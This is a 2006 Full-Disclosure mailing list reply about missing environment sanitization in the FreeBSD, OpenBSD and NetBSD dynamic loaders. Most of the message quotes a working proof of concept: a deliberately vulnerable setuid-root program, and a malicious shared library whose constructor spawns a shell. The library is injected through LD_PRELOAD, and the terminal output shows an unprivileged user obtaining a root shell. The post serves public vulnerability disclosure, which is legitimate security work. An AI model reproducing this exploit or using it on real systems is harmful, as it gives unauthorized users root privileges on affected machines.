Date: Wed, 22 Nov 2006 23:04:12 +0100
From: "Tyop?" <tyoptyop@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Lack of environment sanitization in the FreeBSD, OpenBSD, NetBSD dynamic loaders.

On 11/22/06, Tyop? <tyoptyop@...il.com> wrote:
> On 11/22/06, In Cognito <defend.the.world@...il.com> wrote:
> > Impact:  Serious. May lead to privilege escalation.
> >
> > A class of security vulnerabilities has resurfaced in the dynamic loaders
> > of FreeBSD, OpenBSD, and NetBSD in the sanitization of environment
> > variables for suid and sgid binaries.
> >
> > Due to either badly implemented sanitization or a lack of it, a setuid
> > binary may execute other processes with a tainted environment.
> >
> > [...]
> >
> > Have fun! Stay safe!
> >
>
>
> Fun. Not "perfectly" safe.
>
> My experience :
>
> %id
> uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)
> %cat vuln.c
> #include <unistd.h>
>
> /* Deliberately vulnerable: becomes root, then exec()s a child with the
>    caller's environment (LD_PRELOAD included) passed through untouched. */
> int main(void)
> {
>   setuid(0);
>   execl("/usr/bin/id", "id", (char *)NULL);
>   return 1;
> }
> %cc vuln.c -o vuln && chmod 4711 ./vuln
> %exit
>
> > id
> uid=1001(tyop) gid=1001(tyop) groups=1001(tyop)
> > ls -l vuln
> -rws--x--x  1 root  tyop  4827 Nov 22 22:46 vuln
> > cat tyop.c
> #include <stdio.h>
> #include <unistd.h>
>
> /* Runs when the library is pulled in via LD_PRELOAD, before main(). */
> __attribute__ ((constructor)) static void init(void)
> {
>   printf("[+] Hello from shared library land\n");
>   execle("/bin/sh", "sh", (char *)NULL, (char **)NULL);
> }
> > cc -shared -o lib.so tyop.c
> > setenv LD_PRELOAD "/home/tyop/test/lib.so"
> > ./vuln
> [+] Hello from shared library land
> # id
> uid=0(root) gid=0(wheel) egid=1001(tyop) groups=1001(tyop)
> # echo "It works on `uname -sr`"
> It works on FreeBSD 7.0-CURRENT-200609
> #
>
> Have a nice day.

# echo "It works with vuln static too"
It works with vuln static too.
(sorry for the double post)

-- 
Tyop?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/